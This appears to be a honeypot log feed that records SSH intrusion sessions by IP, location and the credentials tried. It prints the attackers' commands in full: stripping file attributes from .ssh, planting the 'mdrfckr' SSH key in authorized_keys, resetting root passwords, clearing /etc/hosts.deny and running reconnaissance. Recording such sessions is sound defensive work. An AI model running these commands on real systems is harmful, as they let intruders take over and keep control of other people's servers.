$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 pretzel_root_12 (178.105.63.99) β€” Nuremberg, Germany Β· 5 sessions Β· 10 cmds
2026-05-31 20:13 EDT Β· as anna/password, develop/123456, root/123456Yy
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 5x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
🎭 monet_root_2 (87.106.29.151) β€” Paris, France Β· 5 sessions Β· 28 cmds
2026-05-05 21:35 EDT Β· as anna/password, develop/123456, root/123456Yy
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 5x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "tester@123\na3XRlvIvb3uq\na3XRlvIvb3uq"|passwd|bash
$ Enter new UNIX password:
$ echo "tester@123\na3XRlvIvb3uq\na3XRlvIvb3uq\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_26 (209.99.190.113) β€” San Francisco, United States Β· 5 sessions Β· 10 cmds
2026-05-31 20:13 EDT Β· as anna/password, root/123456Yy, root/Jkl123456
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 5x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
🎭 autobahn_root_12 (207.154.230.149) β€” Frankfurt am Main, Germany Β· 6 sessions Β· 12 cmds
2026-05-31 20:11 EDT Β· as anna/password, develop/123456, root/123456Yy
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 6x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—6 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—6 // SSH key persistence
🎭 rogue_11 (27.65.253.41) β€” Ho Chi Minh City, Vietnam Β· 1 session Β· 2 cmds
2026-05-31 20:13 EDT Β· as dmdba/123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 stein_root_13 (217.154.229.122) β€” Berlin, Germany Β· 1 session Β· 2 cmds
2026-05-31 20:10 EDT Β· as root/nE7jANo
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 tulip_root_8 (68.66.251.43) β€” Amsterdam, The Netherlands Β· 4 sessions Β· 25 cmds
2026-05-24 18:31 EDT Β· as anna/password, curl/welltech12, root/Qq112233..
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:04b23FmnCuel"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 strudel_2 (185.221.237.10) β€” Frankfurt am Main, Germany Β· 1 session Β· 2 cmds
2026-05-31 20:09 EDT Β· as dmdba/123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 tea_root_2 (217.154.45.93) β€” Worcester, United Kingdom Β· 2 sessions Β· 21 cmds
2026-05-13 07:52 EDT Β· as root/Jkl123456, root/optic
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Rq7lXqlCaXnd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 baguette_root_6 (51.91.97.236) β€” Roubaix, France Β· 1 session Β· 2 cmds
2026-05-31 20:09 EDT Β· as root/aA111222
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 shadow_7 (2.27.53.183) β€” Helsinki, Finland Β· 1 session Β· 2 cmds
2026-05-31 20:09 EDT Β· as dmdba/123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 pretzel_root_13 (83.219.249.173) β€” Frankfurt Am Main, Germany Β· 3 sessions Β· 42 cmds
2026-05-10 21:02 EDT Β· as anna/password, ftptest/ftptest2024, sakura/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nQxNZI7VB95mC\nQxNZI7VB95mC"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nQxNZI7VB95mC\nQxNZI7VB95mC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "ftptest2024\nFKuvoT2c7upe\nFKuvoT2c7upe"|passwd|bash
$ echo "ftptest2024\nFKuvoT2c7upe\nFKuvoT2c7upe\n"|passwd
🎭 blitz_root_7 (51.75.64.35) β€” Limburg an der Lahn, Germany Β· 2 sessions Β· 21 cmds
2026-05-28 13:00 EDT Β· as root/Qwer123456, root/aA111222
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:X3Gh5OZcFLb4"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 blitz_root_8 (139.59.208.49) β€” Frankfurt am Main, Germany Β· 3 sessions Β· 24 cmds
2026-05-23 05:20 EDT Β· as es/123456, root/Pi@12345678, root/aA111222
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\n0InuD1ivrSXZ\n0InuD1ivrSXZ"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\n0InuD1ivrSXZ\n0InuD1ivrSXZ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_7 (138.124.99.219) β€” Helsinki, Finland Β· 1 session Β· 2 cmds
2026-05-31 20:06 EDT Β· as dmdba/123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 pretzel (195.201.127.15) β€” Nuremberg, Germany Β· 1 session Β· 2 cmds
2026-05-31 20:06 EDT Β· as anna/password
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 blitz_root_9 (164.92.161.148) β€” Frankfurt am Main, Germany Β· 1 session Β· 2 cmds
2026-05-31 20:06 EDT Β· as root/nE7jANo
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 wraith_8 (85.192.31.14) β€” Helsinki, Finland Β· 1 session Β· 2 cmds
2026-05-31 20:06 EDT Β· as upload/upload
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 stein_root_14 (178.105.134.131) β€” Nuremberg, Germany Β· 1 session Β· 2 cmds
2026-05-31 20:05 EDT Β· as root/aA111222
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 stein_root_15 (178.105.99.204) β€” Nuremberg, Germany Β· 1 session Β· 2 cmds
2026-05-31 20:05 EDT Β· as root/aA111222
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 strudel_root_5 (152.53.251.179) β€” Karlsruhe, Germany Β· 1 session Β· 2 cmds
2026-05-31 20:04 EDT Β· as root/Jkl123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
